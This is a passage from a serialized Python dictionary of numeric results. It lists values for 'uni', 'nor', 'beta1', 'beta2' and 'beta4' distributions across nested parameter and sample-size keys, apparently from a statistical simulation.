'nor': 0.5927363236218804, 'beta1': 0.21031761704813068, 'beta2': 0.6698968663874326, 'beta4': 0.1308993211614878}, 300: {'uni': 0.21116665878281402, 'nor': 0.4896592957082567, 'beta1': 0.20684320922443974, 'beta2': 0.5512275592001699, 'beta4': 0.1384612397829126}, 200: {'uni': 0.2065247059685983, 'nor': 0.39835048373839826, 'beta1': 0.21174588540195607, 'beta2': 0.44630982353810156, 'beta4': 0.14805783066157965}, 150: {'uni': 0.20928770803093008, 'nor': 0.34961127920202617, 'beta1': 0.2109639639405676, 'beta2': 0.3797293742818744, 'beta4': 0.15746136802847555}, 100: {'uni': 0.20516824818584412, 'nor': 0.3028139312794487, 'beta1': 0.20853523204098995, 'beta2': 0.32225079750893787, 'beta4': 0.16753709332890135}, 75: {'uni': 0.20502748437818377, 'nor': 0.2741211171871183, 'beta1': 0.2105448811718868, 'beta2': 0.29080653527776035, 'beta4': 0.17337872442507027}, 50: {'uni': 0.20975717836080796, 'nor': 0.2565379219984574, 'beta1': 0.20800987078537114, 'beta2': 0.2600989628289811, 'beta4': 0.18429779524384918}, 30: {'uni': 0.20720342119680604, 'nor': 0.24088086582328805, 'beta1': 0.20748583588931385, 'beta2': 0.24007860960850408, 'beta4': 0.19211149401323768}, 20: {'uni': 0.20755790128204296, 'nor': 0.22922666615794668, 'beta1': 0.21085331137645344, 'beta2': 0.2271126160773065, 'beta4': 0.19726350188991543}, 10: {'uni': 0.2115436004822682, 'nor': 0.21966947518702792, 'beta1': 0.21107364597857337, 'beta2': 0.22048945023217323, 'beta4': 0.20507045435880536}}, 100: {1000: {'uni': 0.21967845045275625, 'nor': 1.656278094432771, 'beta1': 0.21090054785594217, 'beta2': 1.405234644927156, 'beta4': 0.1134712510665932}, 750: {'uni': 0.2182058622345823, 'nor': 1.265623071214558, 'beta1': 0.21028572752611807, 'beta2': 1.1279524417411784, 'beta4': 0.11526715616074444}, 500: {'uni': 0.21472950659279263, 'nor': 0.9157340420582806, 'beta1': 0.20915259969907926, 'beta2': 0.8857345708052237, 'beta4': 0.11958569682583288}, 400: {'uni': 0.21489446434289045, 'nor': 0.7677784731205918, 'beta1': 0.21081206178893352, 'beta2': 0.7609743126081624, 'beta4': 0.12541109277349732}, 300: {'uni': 0.2159893589251412, 'nor': 0.6256342238393243, 'beta1': 0.20763666455794746, 'beta2': 0.6119368944285761, 'beta4': 0.13023773680445308}, 200: {'uni': 0.2091742902933585, 'nor': 0.48879729015887435, 'beta1': 0.20831908379432781, 'beta2': 0.4888715032902842, 'beta4': 0.13778468684559775}, 150: {'uni': 0.2090160321323569, 'nor': 0.4187490294676396, 'beta1': 0.2109398590174564, 'beta2': 0.43024124336877606, 'beta4': 0.1462052336856702}, 100: {'uni': 0.2104322507772914, 'nor': 0.35145353863818374, 'beta1': 0.2078275315127688, 'beta2': 0.3527286738203107, 'beta4': 0.15819495462335323}, 75: {'uni': 0.20969432604237917, 'nor': 0.3190469158495116, 'beta1': 0.2123788151559664, 'beta2': 0.31885461616358585, 'beta4': 0.16304448328983254}, 50: {'uni': 0.2087204645903672, 'nor': 0.2784565063957156, 'beta1': 0.20898686396465999, 'beta2': 0.2724721715932801, 'beta4': 0.1748949757811885}, 30: {'uni': 0.21180576782357857, 'nor': 0.2510792661255587, 'beta1': 0.21157574079679234, 'beta2': 0.2492653810399887, 'beta4': 0.18637405643646768}, 20: {'uni': 0.20986822684158538, 'nor': 0.24044968609243367, 'beta1': 0.20976936068946686, 'beta2': 0.22969757707032978, 'beta4': 0.1933966348868532}, 10: {'uni': 0.2092931057812649, 'nor': 0.2274358627877835, 'beta1': 0.20973251389792952, 'beta2': 0.22006451815316508, 'beta4': 0.20444803640329232}}, 75: {1000: {'uni': 0.23513931545998662, 'nor': 2.084909469742905, 'beta1': 0.21014505352475218, 'beta2': 1.5806301519779993, 'beta4': 0.10998758656318001}, 750: {'uni': 0.2286541491929865, 'nor': 1.6373557492661108, 'beta1': 0.20978951011443275, 'beta2': 1.2456465113380724, 'beta4': 0.11259632219485577}, 500: {'uni': 0.22247281469777053, 'nor': 1.150511057022818, 'beta1': 0.2073585482490993, 'beta2': 0.9812552247229969, 'beta4': 0.11625486022546717}, 400: {'uni': 0.21951372585892182, 'nor': 0.9569843642606499, 'beta1': 0.20823968509523264, 'beta2': 0.8066142797690702, 'beta4': 0.12044519385671562}, 300: {'uni': 0.21781287693048623, 'nor': 0.7725858773053905, 'beta1': 0.21194743463485233, 'beta2': 0.6922651737298109, 'beta4': 0.12461002806743086}, 200: {'uni': 0.21199124103966535, 'nor': 0.580982989647824, 'beta1': 0.20939209173887577, 'beta2': 0.5462914146214966, 'beta4': 0.13270550013960777}, 150: {'uni': 0.21252879710179673, 'nor': 0.4987347923010613, 'beta1': 0.20783211493381504, 'beta2': 0.45356054189282985, 'beta4': 0.13809523671194257}, 100: {'uni': 0.2089361893031747, 'nor': 0.403915226761567, 'beta1': 0.2093217404846438, 'beta2': 0.38016607644734646, 'beta4': 0.14840466776444083}, 75: {'uni': 0.2081440553080188, 'nor': 0.35109507781411226, 'beta1': 0.20929729980155615, 'beta2': 0.3327341468495961, 'beta4': 0.1540449114797875}, 50: {'uni': 0.20581675234683908, 'nor': 0.30206067979551837, 'beta1': 0.21021696834721026, 'beta2': 0.2861955478547944, 'beta4': 0.16633361029387916}, 30: {'uni': 0.20734524509571534, 'nor': 0.267037913698908, 'beta1': 0.2070263091653566, 'beta2': 0.25806159877220175, 'beta4': 0.17863030675847164}, 20: {'uni': 0.2096733930631222, 'nor': 0.2460070167669823, 'beta1': 0.20871469364964274, 'beta2': 0.2372662315858424, 'beta4': 0.1892580676002318}, 10: {'uni': 0.20922208007633622, 'nor': 0.23213075562898852, 'beta1': 0.21070476962686652, 'beta2': 0.2225315024021926, 'beta4': 0.19641028263808016}}, 50: {1000: {'uni': 0.2695254349236613, 'nor': 3.142691210261647, 'beta1': 0.21770786185287255, 'beta2': 1.9099319895352667, 'beta4': 0.10829969370253238}, 750: {'uni': 0.2588039542291625, 'nor': 2.4104366375812973, 'beta1': 0.21243577719321954, 'beta2': 1.5161955837891, 'beta4': 0.11111092000239313}, 500: {'uni': 0.24151301038044345, 'nor': 1.642139887107223, 'beta1': 0.20971867796492333, 'beta2': 1.1517381077121902, 'beta4': 0.11227898068455419}, 400: {'uni': 0.23019437797823078, 'nor': 1.3289789466534643, 'beta1': 0.20926242715400342, 'beta2': 0.9729778013434685, 'beta4': 0.11417269932418249}, 300: {'uni': 0.22430893764793297, 'nor': 1.0745150609309957, 'beta1': 0.21074805474629227, 'beta2': 0.7874596109511961, 'beta4': 0.11759814856362567}, 200: {'uni': 0.21975399445220514, 'nor': 0.7819720121056168, 'beta1': 0.21103937980028964, 'beta2': 0.6018534363417153, 'beta4': 0.12339286742106902}, 150: {'uni': 0.21535142554197367, 'nor': 0.6399318456941945, 'beta1': 0.20746526428424497, 'beta2': 0.5252845548984273, 'beta4': 0.1299381165608297}, 100: {'uni': 0.2123454504262325, 'nor': 0.49216704078244555, 'beta1': 0.2107022782636202, 'beta2': 0.4230176226912828, 'beta4': 0.1378036793670446}, 75: {'uni': 0.21339732015322407, 'nor': 0.43149068654833117, 'beta1': 0.21058764807741492, 'beta2': 0.3671011243377202, 'beta4': 0.14620561061096438}, 50: {'uni': 0.205847661172318, 'nor': 0.35582897249323403, 'beta1': 0.20909648270681516, 'beta2': 0.31178396791388713, 'beta4': 0.15722296123371624}, 30: {'uni': 0.20934069442572217, 'nor': 0.29138119383616384, 'beta1': 0.20982580627900296, 'beta2': 0.26854176799687446, 'beta4': 0.17071014481863203}, 20: {'uni': 0.20668196194747926, 'nor': 0.26568332305135134, 'beta1': 0.2093142297545193, 'beta2': 0.24526630860745893, 'beta4': 0.17811324491132643}, 10: {'uni': 0.20958328438574503, 'nor': 0.23896053895205074, 'beta1': 0.20621410607741605, 'beta2': 0.22919187002100394, 'beta4': 0.19431842828786478}}, 30: {1000: {'uni': 0.39110763945461735, 'nor': 5.116424860683267, 'beta1': 0.2276039800167104, 'beta2': 2.4580179105664364, 'beta4': 0.1066835465038891}, 750: {'uni': 0.3418714368913198, 'nor': 3.8744007700100593, 'beta1': 0.22395548891655492, 'beta2': 2.0103017113808224, 'beta4': 0.10947374482580367}, 500: {'uni': 0.2975942162732659, 'nor': 2.6218136300691874, 'beta1': 0.21825444046578688, 'beta2': 1.3847556622818173, 'beta4': 0.10899418892034965}, 400: {'uni': 0.27461362852151405, 'nor': 2.1151034436155616, 'beta1': 0.2171198331223813, 'beta2': 1.2167467458708006, 'beta4': 0.11163855842113928}, 300: {'uni': 0.2543881091715356, 'nor': 1.6452365204119028, 'beta1': 0.212256506611666, 'beta2': 0.9687476062374452, 'beta4': 0.1115492019613656}, 200: {'uni': 0.2363522619554879, 'nor': 1.1677455360609652, 'beta1': 0.20966125872182179, 'beta2': 0.7425629231901374, 'beta4': 0.11625099173205072}, 150: {'uni': 0.2284148219949321, 'nor': 0.9574829237962695, 'beta1': 0.21023861819542058, 'beta2': 0.6139346611358466, 'beta4': 0.12009639988691045}, 100: {'uni': 0.22172498485669878, 'nor': 0.6915027995999989, 'beta1': 0.20918706109846394, 'beta2': 0.4869056843738299, 'beta4': 0.12638594109716492}, 75: {'uni': 0.2133168698992867, 'nor': 0.5682112038946274, 'beta1': 0.20975000504788754, 'beta2': 0.415282241094064, 'beta4': 0.13226527569518623}, 50: {'uni': 0.2102271307152469, 'nor': 0.44595128782042287, 'beta1': 0.20889065230992968, 'beta2': 0.3465767337644295, 'beta4': 0.14070658143472944}, 30: {'uni': 0.2081426512303808, 'nor': 0.35207891188712104, 'beta1': 0.20871532977976312, 'beta2': 0.29316990128238446, 'beta4': 0.15666183548008356}, 20: {'uni': 0.20613997335614362, 'nor': 0.30583981878707406, 'beta1': 0.20836781704793886, 'beta2': 0.2598156056480911, 'beta4': 0.16790033081050695}, 10: {'uni': 0.20923753020638328, 'nor': 0.2612046113020479, 'beta1': 0.20989685334843394, 'beta2': 0.23114069560918055, 'beta4': 0.1835407880975625}}, 20: {1000: {'uni': 0.6207826394599372, 'nor': 7.622424720173352, 'beta1': 0.27350677793760486, 'beta2': 3.3492996942172333, 'beta4': 0.10628262555709497}, 750: {'uni': 0.5048166737138563, 'nor': 5.758152270393112, 'beta1': 0.2554155723862364, 'beta2': 2.628076590546046, 'beta4': 0.10565019639609735}, 500: {'uni': 0.3994453354156638, 'nor': 3.893980758511552, 'beta1': 0.23597727883342787, 'beta2': 1.8214218995092328, 'beta4': 0.1070101907165029}, 400: {'uni': 0.36101676480694145, 'nor': 3.2044600872159323, 'beta1': 0.23459375200447094, 'beta2': 1.5251543211986895, 'beta4': 0.10821295023254038}, 300: {'uni': 0.3141921739962661, 'nor': 2.4222433418314364, 'beta1': 0.2253430945453138, 'beta2': 1.1967541480073822, 'beta4': 0.1099708991006131}, 200: {'uni': 0.27835872559274455, 'nor': 1.681652690097508, 'beta1': 0.21894420597565414, 'beta2': 0.8889375477356823, 'beta4': 0.11351788787975257}, 150: {'uni': 0.2559570089433474, 'nor': 1.3438963170616764, 'beta1': 0.21477483270291053, 'beta2': 0.7257408247226198, 'beta4': 0.11394879683852287}, 100: {'uni': 0.23822025966558683, 'nor': 0.9711825862107801, 'beta1': 0.20802563703769897, 'beta2': 0.5623026745072711, 'beta4': 0.12026175575681236}, 75: {'uni': 0.2293403279687202, 'nor': 0.7729220747351444, 'beta1': 0.21100752732670153, 'beta2': 0.48330787981629864, 'beta4': 0.12382986936052359}, 50: {'uni': 0.21915378007158956, 'nor': 0.5693299836933317, 'beta1': 0.2078415744294394, 'beta2': 0.38674682907023844, 'beta4': 0.13204002010791535}, 30: {'uni': 0.2082265622167124, 'nor': 0.43443417831024433, 'beta1': 0.20687391089208745, 'beta2': 0.31119395493380003, 'beta4': 0.1431516191386846}, 20: {'uni': 0.20786603570028708, 'nor': 0.3572940044777373, 'beta1': 0.20719910244124543, 'beta2': 0.27721462641843725, 'beta4': 0.1572608236251125}, 10: {'uni': 0.20369256732614355, 'nor': 0.28182536192865026, 'beta1': 0.20756249721014605, 'beta2': 0.2385183054251573, 'beta4': 0.1697626070090186}}, 10: {1000: {'uni': 1.7848701057995784, 'nor': 15.635739381402702, 'beta1': 0.7153891703487703, 'beta2': 5.697088420798187, 'beta4': 0.10421112845871394}, 750: {'uni': 1.3727979678132771, 'nor': 11.906755261463388, 'beta1': 0.5779728985731243, 'beta2': 4.449716590642079, 'beta4': 0.10498414486075403}, 500: {'uni': 0.9573992786589071, 'nor': 7.970320890499278, 'beta1': 0.43798339579132395, 'beta2': 2.974231536993935, 'beta4': 0.105026735404256}, 400: {'uni': 0.7914977735882762, 'nor': 6.440897945489786, 'beta1': 0.39007392596960755, 'beta2': 2.429667687774588, 'beta4': 0.10605337636852458}, 300: {'uni': 0.631330878442672, 'nor': 4.933284287935752, 'beta1': 0.33438904339835235, 'beta2': 1.877753461391385, 'beta4': 0.1073668070340185}, 200: {'uni': 0.48173020420613244, 'nor': 3.3803827492127008, 'beta1': 0.28744959584371677, 'beta2': 1.3439600818077662, 'beta4': 0.10776359310849748}, 150: {'uni': 0.40031324179507105, 'nor': 2.57622592994642, 'beta1': 0.26035189199173386, 'beta2': 1.0427967524110597, 'beta4': 0.11000574720566421}, 100: {'uni': 0.3308720201998832, 'nor': 1.7649850100433184, 'beta1': 0.2383561944351031, 'beta2': 0.7771083680176007, 'beta4': 0.11235247896090703}, 75: {'uni': 0.2865533700253337, 'nor': 1.3593086400799728, 'beta1': 0.23083619480349551, 'beta2': 0.6354900601807595, 'beta4': 0.1136946403621595}, 50: {'uni': 0.25864424310430745, 'nor': 0.9824603279253074, 'beta1': 0.22334506582001382, 'beta2': 0.49223837414214233, 'beta4': 0.12081061110449474}, 30: {'uni': 0.22836973422604787, 'nor': 0.676619660745287, 'beta1': 0.20951021970104433, 'beta2': 0.3741306279869527, 'beta4': 0.12652156529997072}, 20: {'uni': 0.21515643043692204, 'nor': 0.5180809461964594, 'beta1': 0.20397488858742926, 'beta2': 0.3088295715698039, 'beta4': 0.13725565024846206}, 10: {'uni': 0.20341357315487396, 'nor': 0.3736834213121383, 'beta1': 0.20162371182875433, 'beta2': 0.24957048788715058, 'beta4': 0.15490910948174905}}}, 0.3: {1000: {1000: {'uni': 0.18428871913527797, 'nor': 0.30135078484266026, 'beta1': 0.18393654917719088, 'beta2': 0.6623093381207533, 'beta4': 0.14032810218137845}, 750: {'uni': 0.18262805116604833, 'nor': 0.27195486539150565, 'beta1': 0.18602130658962418, 'beta2': 0.4878718144267021, 'beta4': 0.14691168329765347}, 500: {'uni': 0.18356636941170307, 'nor': 0.2416953142020874, 'beta1': 0.18423960757549646, 'beta2': 0.357987213680477, 'beta4': 0.15566079017126216}, 400: {'uni': 0.18398269310746806, 'nor': 0.23033211237917395, 'beta1': 0.18313599133249095, 'beta2': 0.31498091495327957, 'beta4': 0.15747557950230512}, 300: {'uni': 0.18359581287903043, 'nor': 0.21664672148715478, 'beta1': 0.1859716509858502, 'beta2': 0.27672572480296337, 'beta4': 0.16484989128991967}, 200: {'uni': 0.18292786874448827, 'nor': 0.20406786775434288, 'beta1': 0.1842414647509748, 'beta2': 0.24027300035558413, 'beta4': 0.1699466212939197}, 150: {'uni': 0.18455107320985933, 'nor': 0.20188485575373824, 'beta1': 0.18479437012880134, 'beta2': 0.22923323632544906, 'beta4': 0.16924173674935705}, 100: {'uni': 0.18513992851403205, 'nor': 0.19487665525991182, 'beta1': 0.18489669398913675, 'beta2': 0.20828847343235687, 'beta4': 0.17566406407424956}, 75: {'uni': 0.1865632455464677, 'nor': 0.19358711616627014, 'beta1': 0.18565141251922007, 'beta2': 0.20582303873952032, 'beta4': 0.1791155456720297}, 50: {'uni': 0.18426457302663726, 'nor': 0.1916482647518717, 'beta1': 0.1852315833036702, 'beta2': 0.19764339843274478, 'beta4': 0.18112274314507698}, 30: {'uni': 0.18349819467351894, 'nor': 0.1888489836368484, 'beta1': 0.18261593670270432, 'beta2': 0.19034464682698157, 'beta4': 0.18224418746461715}, 20: {'uni': 0.1820714679130019, 'nor': 0.18754105929514656, 'beta1': 0.18430122581588568, 'beta2': 0.1920075339274084, 'beta4': 0.1834021882349476}, 10: {'uni': 0.18739411665561917, 'nor': 0.18497627238155476, 'beta1': 0.18440842636140978, 'beta2': 0.18841016365805804, 'beta4': 0.1846995716387348}}, 750: {1000: {'uni': 0.18374768272406486, 'nor': 0.3362941599325207, 'beta1': 0.18340789412067696, 'beta2': 0.664773656168264, 'beta4': 0.13309238170252863}, 750: {'uni': 0.18528145820779707, 'nor': 0.30013344141016346, 'beta1': 0.1831987566147265, 'beta2': 0.5032347489310731, 'beta4': 0.1410482071937854}, 500: {'uni': 0.18484168589686367, 'nor': 0.2605615429499437, 'beta1': 0.18463915891771657, 'beta2': 0.3713535347423807, 'beta4': 0.14822832304391478}, 400: {'uni': 0.18311116918143328, 'nor': 0.2459445558763436, 'beta1': 0.1845402672165048, 'beta2': 0.31907073757767096, 'beta4': 0.15317162329719258}, 300: {'uni': 0.18617543522232655, 'nor': 0.2298916232269604, 'beta1': 0.18461903342585026, 'beta2': 0.28363567342745244, 'beta4': 0.16036130415744101}, 200: {'uni': 0.18393910883726228, 'nor': 0.21640952080746054, 'beta1': 0.1818765723127742, 'beta2': 0.25012191141345425, 'beta4': 0.16552665865239316}, 150: {'uni': 0.18417926544247398, 'nor': 0.21092728516574843, 'beta1': 0.18212118551922038, 'beta2': 0.23142014151434875, 'beta4': 0.17002055544787953}, 100: {'uni': 0.18660805942978306, 'nor': 0.20081262797470406, 'beta1': 0.18602127924312306, 'beta2': 0.21271648680506355, 'beta4': 0.17563839287175947}, 75: {'uni': 0.18251540717557313, 'nor': 0.19535814734848456, 'beta1': 0.18595619280052217, 'beta2': 0.20594100979366686, 'beta4': 0.17820076426208542}, 50: {'uni': 0.18539776665656268, 'nor': 0.18951186752224017, 'beta1': 0.1852697716498855, 'beta2': 0.19992731375199027, 'beta4': 0.1784937421131358}, 30: {'uni': 0.18536533904676694, 'nor': 0.18935679046326837, 'beta1': 0.1841613478222738, 'beta2': 0.1916231974678531, 'beta4': 0.18187773474697502}, 20: {'uni': 0.1848315245851324, 'nor': 0.18898711958365183, 'beta1': 0.18464481892838294, 'beta2': 0.19085126812258635, 'beta4': 0.1811843211494424}, 10: {'uni': 0.18587075842322476, 'nor': 0.18597838609621442, 'beta1': 0.18573865004138826, 'beta2': 0.18763548127142246, 'beta4': 0.18370702416582232}}, 500: {1000: {'uni': 0.1840197346218617, 'nor': 0.41329662361079555, 'beta1': 0.18357700766562535, 'beta2': 0.7671344496261001, 'beta4': 0.1239289639044978}, 750: {'uni': 0.1862202743865642, 'nor': 0.3558982422843902, 'beta1': 0.18378140850915506, 'beta2': 0.564532583117132, 'beta4': 0.13340893800976383}, 500: {'uni': 0.1867485748124686, 'nor': 0.2977486468510908, 'beta1': 0.18390546912974548, 'beta2': 0.4195979083937472, 'beta4': 0.14038875085337116}, 400: {'uni': 0.18301639686674334, 'nor': 0.2769565773370171, 'beta1': 0.18366710919376103, 'beta2': 0.3628265004684875, 'beta4': 0.14451613900496404}, 300: {'uni': 0.18217744868887228, 'nor': 0.25629722024533996, 'beta1': 0.18385836640021477, 'beta2': 0.3176579397228085, 'beta4': 0.1524618313858445}, 200: {'uni': 0.18381375844550923, 'nor': 0.23550026000616722, 'beta1': 0.18438255429091854, 'beta2': 0.2656404724828914, 'beta4': 0.16063694634139747}, 150: {'uni': 0.185767292870415, 'nor': 0.21655429857888203, 'beta1': 0.18544627228662178, 'beta2': 0.24932819367864345, 'beta4': 0.16092725112085177}, 100: {'uni': 0.183824799626394, 'nor': 0.20477567037634878, 'beta1': 0.18240757458040802, 'beta2': 0.2309883526806697, 'beta4': 0.16967806719643808}, 75: {'uni': 0.18605984660927738, 'nor': 0.2028444202047503, 'beta1': 0.18483867144383112, 'beta2': 0.21138880444392175, 'beta4': 0.17257719810968203}, 50: {'uni': 0.1839877971831852, 'nor': 0.19904840183947525, 'beta1': 0.18435011648014876, 'beta2': 0.2031296680146621, 'beta4': 0.17697434657873212}, 30: {'uni': 0.1852975402896129, 'nor': 0.1937864670123576, 'beta1': 0.1844117140912648, 'beta2': 0.19398025817323694, 'beta4': 0.1787671102793916}, 20: {'uni': 0.1835863762986978, 'nor': 0.18775276741046626, 'beta1': 0.1854475463987617, 'beta2': 0.19424887742008315, 'beta4': 0.1825324678833545}, 10: {'uni': 0.18547874179765314, 'nor': 0.18647231053828683, 'beta1': 0.18691385489683274, 'beta2': 0.18948179328044443, 'beta4': 0.18672470390138896}}, 400: {1000: {'uni': 0.1841369848304773, 'nor': 0.487660743593779, 'beta1': 0.18603853288523334, 'beta2': 0.7559165215470582, 'beta4': 0.12068379560836835}, 750: {'uni': 0.18594200781108275, 'nor': 0.4019961108476163, 'beta1': 0.1831083524376866, 'beta2': 0.5621271751603673, 'beta4': 0.12505172473964998}, 500: {'uni': 0.18127077759894958, 'nor': 0.33508422714167163, 'beta1': 0.18535703359501093, 'beta2': 0.41486646451853243, 'beta4': 0.13358961945450476}, 400: {'uni': 0.18847261367235257, 'nor': 0.30475927406457665, 'beta1': 0.18497037370002964, 'beta2': 0.36875432228911315, 'beta4': 0.14131860591700407}, 300: {'uni': 0.1834846960752523, 'nor': 0.27353443866255184, 'beta1': 0.1834736799127996, 'beta2': 0.3187931017458791, 'beta4': 0.14680948452922632}, 200: {'uni': 0.18409437296619705, 'nor': 0.24217133661747858, 'beta1': 0.18522243948305703, 'beta2': 0.28587114638809447, 'beta4': 0.15505648619089624}, 150: {'uni': 0.18244003118893568, 'nor': 0.226720503763241, 'beta1': 0.18452371980644955, 'beta2': 0.2611888455461119, 'beta4': 0.16155402213844164}, 100: {'uni': 0.18514469973669406, 'nor': 0.21427742853579504, 'beta1': 0.1851360561865889, 'beta2': 0.22915500414895795, 'beta4': 0.16887082288872826}, 75: {'uni': 0.1835023368961724, 'nor': 0.20486594519436654, 'beta1': 0.18377651974601344, 'beta2': 0.21901133656471286, 'beta4': 0.17287421533479064}, 50: {'uni': 0.18342146941233753, 'nor': 0.19818564803314914, 'beta1': 0.18651883278191514, 'beta2': 0.20678119783042662, 'beta4': 0.1747652506641469}, 30: {'uni': 0.18552948646943832, 'nor': 0.1935765150016701, 'beta1': 0.18278857493937808, 'beta2': 0.19611341856361825, 'beta4': 0.17788395999027673}, 20: {'uni': 0.1854587786790248, 'nor': 0.1919505201797072, 'beta1': 0.18541896834325705, 'beta2': 0.19533887086414536, 'beta4': 0.18198315689749184}, 10: {'uni': 0.18885914557340622, 'nor': 0.18992736227894721, 'beta1': 0.1849685952581873, 'beta2': 0.19142863221490666, 'beta4': 0.18437904185055504}}, 300: {1000: {'uni': 0.1859502958978716, 'nor': 0.572254915990919, 'beta1': 0.18506222558285604, 'beta2': 0.8127163948003021, 'beta4': 0.11600632777201067}, 750: {'uni': 0.18353876060887495, 'nor': 0.47315381492266284, 'beta1': 0.1848466855593917, 'beta2': 0.6057402676429029, 'beta4': 0.12128921997929693}, 500: {'uni': 0.18626459428841338, 'nor': 0.3739859643670168, 'beta1': 0.18370108978687505, 'beta2': 0.4519785398696026, 'beta4': 0.12934443321886013}, 400: {'uni': 0.1846926635410675, 'nor': 0.3373977956534747, 'beta1': 0.18379894550505346, 'beta2': 0.4001772516695409, 'beta4': 0.1324871096490525}, 300: {'uni': 0.18335882742457615, 'nor': 0.30207061691602766, 'beta1': 0.18498395112897797, 'beta2': 0.36823738539844797, 'beta4': 0.1377813467667352}, 200: {'uni': 0.18146517018597558, 'nor': 0.2626023742570726, 'beta1': 0.18490638293978268, 'beta2': 0.3032691430926139, 'beta4': 0.14811129872849652}, 150: {'uni': 0.18567150605670413, 'nor': 0.24293312006244636, 'beta1': 0.1839383721262982, 'beta2': 0.275147983363257, 'beta4': 0.15562446570752247}, 100: {'uni': 0.18188590503553012, 'nor': 0.22192190869354672, 'beta1': 0.18220796971542047, 'beta2': 0.23656612557764944, 'beta4': 0.16384483291051324}, 75: {'uni': 0.18269712408432776, 'nor': 0.21086971209758135, 'beta1': 0.1834266929677532, 'beta2': 0.22384625002314135, 'beta4': 0.16689861495602365}, 50: {'uni': 0.1840829104983384, 'nor': 0.20409631279707927, 'beta1': 0.18537818691491365, 'beta2': 0.21037244642654657, 'beta4': 0.17260776897824953}, 30: {'uni': 0.1857425742322888, 'nor': 0.19571874411864754, 'beta1': 0.1841318534190506, 'beta2': 0.19779885160629435, 'beta4': 0.17876031436503564}, 20: {'uni': 0.1832365591664123, 'nor': 0.19167311662078532, 'beta1': 0.18394313243440424, 'beta2': 0.19630589705739027, 'beta4': 0.17733581077369834}, 10: {'uni': 0.18618532512109023, 'nor': 0.19128318068045697, 'beta1': 0.18757253910951685, 'beta2': 0.1883616111678228, 'beta4': 0.18555417888606063}}, 200: {1000: {'uni': 0.18447141627562533, 'nor': 0.7699551232189373, 'beta1': 0.18500514582732694, 'beta2': 0.9127793666354577, 'beta4': 0.11011784883611928}, 750: {'uni': 0.18259356525682377, 'nor': 0.6257554784789408, 'beta1': 0.18488440955510677, 'beta2': 0.7088043074557446, 'beta4': 0.11359776947078477}, 500: {'uni': 0.18589358539985096, 'nor': 0.4829959037714713, 'beta1': 0.183474877505319, 'beta2': 0.514168880108097, 'beta4': 0.11953892464970942}, 400: {'uni': 0.18351796321070915, 'nor': 0.4164296854250865, 'beta1': 0.18195958720877065, 'beta2': 0.5056205486626194, 'beta4': 0.12416969797920921}, 300: {'uni': 0.18481464734448674, 'nor': 0.3658259098465722, 'beta1': 0.18663125274408293, 'beta2': 0.416910138713319, 'beta4': 0.13056310975294855}, 200: {'uni': 0.18530334268616938, 'nor': 0.302407317725596, 'beta1': 0.1834849866924257, 'beta2': 0.3292982361018997, 'beta4': 0.13984005968045923}, 150: {'uni': 0.18596448269266944, 'nor': 0.2739436092802089, 'beta1': 0.18707957912766168, 'beta2': 0.30543377100001085, 'beta4': 0.14629701832782}, 100: {'uni': 0.1832977085363229, 'nor': 0.23946363968388915, 'beta1': 0.18427350012102758, 'beta2': 0.2591834715329377, 'beta4': 0.15533563468189326}, 75: {'uni': 0.18356926635465065, 'nor': 0.2279517116490053, 'beta1': 0.1830851794256456, 'beta2': 0.23633947470700803, 'beta4': 0.16177484111825208}, 50: {'uni': 0.18425403756506012, 'nor': 0.2157915511740745, 'beta1': 0.1820152616826392, 'beta2': 0.21828882661440663, 'beta4': 0.16842779941176925}, 30: {'uni': 0.18360266531359176, 'nor': 0.20210998834312802, 'beta1': 0.18687171669955455, 'beta2': 0.20496758550143304, 'beta4': 0.17293751761529214}, 20: {'uni': 0.1851863710681571, 'nor': 0.19433366890581394, 'beta1': 0.18557623225739414, 'beta2': 0.19875199384282216, 'beta4': 0.17788405593123227}, 10: {'uni': 0.18634472764248708, 'nor': 0.19324764133732816, 'beta1': 0.18562771164336173, 'beta2': 0.19080409259813716, 'beta4': 0.18110054533211944}}, 150: {1000: {'uni': 0.1912754452360089, 'nor': 0.9625954838302346, 'beta1': 0.1850480515459952, 'beta2': 1.0300633923301075, 'beta4': 0.10637413003748875}, 750: {'uni': 0.18945058480162008, 'nor': 0.7695073156807593, 'beta1': 0.18526507906977255, 'beta2': 0.8083193173277922, 'beta4': 0.1106638358872608}, 500: {'uni': 0.185620108086503, 'nor': 0.5726722059040364, 'beta1': 0.18357606652829983, 'beta2': 0.6528292568827052, 'beta4': 0.11579632790357713}, 400: {'uni': 0.18917591701097058, 'nor': 0.49529277931636245, 'beta1': 0.1834642136948372, 'beta2': 0.5381420829901148, 'beta4': 0.12006342755769683}, 300: {'uni': 0.18687744942049392, 'nor': 0.419608439413199, 'beta1': 0.18478819848060082, 'beta2': 0.45118218759273077, 'beta4': 0.1258962883197106}, 200: {'uni': 0.18418101094464367, 'nor': 0.33878294396897896, 'beta1': 0.1829759224784113, 'beta2': 0.37076816072824964, 'beta4': 0.13532357390907895}, 150: {'uni': 0.18418481072808665, 'nor': 0.29815778996985826, 'beta1': 0.18625340494055306, 'beta2': 0.3241801066525806, 'beta4': 0.13951205890829702}, 100: {'uni': 0.18327140323275803, 'nor': 0.26188762705474206, 'beta1': 0.18344353301364413, 'beta2': 0.2752468213062559, 'beta4': 0.1503016146561893}, 75: {'uni': 0.18201478524070183, 'nor': 0.24581445083697057, 'beta1': 0.1853887999165348, 'beta2': 0.2445694630913998, 'beta4': 0.15565064425067696}, 50: {'uni': 0.18452051279131734, 'nor': 0.222129436245253, 'beta1': 0.18516263138095312, 'beta2': 0.22467151056734352, 'beta4': 0.16108458373940354}, 30: {'uni': 0.1824891516495398, 'nor': 0.2053607180567544, 'beta1': 0.18509905830949186, 'beta2': 0.20779712298354724, 'beta4': 0.1699616752517214}, 20: {'uni': 0.18300669688455398, 'nor': 0.20274525612006072, 'beta1': 0.18328208302262802, 'beta2': 0.19765528888056297, 'beta4': 0.17491649721982203}, 10: {'uni': 0.1848066711618625, 'nor': 0.19231164434042297, 'beta1': 0.18438331438611105, 'beta2': 0.19484072521797707, 'beta4': 0.17971946823829243}}, 100: {1000: {'uni': 0.19811466492827273, 'nor': 1.3512753542524134, 'beta1': 0.18272420510815907, 'beta2': 1.1851946304410805, 'beta4': 0.1021515448919693}, 750: {'uni': 0.19486636364500992, 'nor': 1.0795208594455619, 'beta1': 0.1827435190842583, 'beta2': 0.8879856010389023, 'beta4': 0.10578996546915725}, 500: {'uni': 0.1878660706186934, 'nor': 0.7908944071120905, 'beta1': 0.18372014934617817, 'beta2': 0.7190908861845601, 'beta4': 0.10798328428429449}, 400: {'uni': 0.18856719881543738, 'nor': 0.6515181196215094, 'beta1': 0.18257792204790377, 'beta2': 0.6089945179002064, 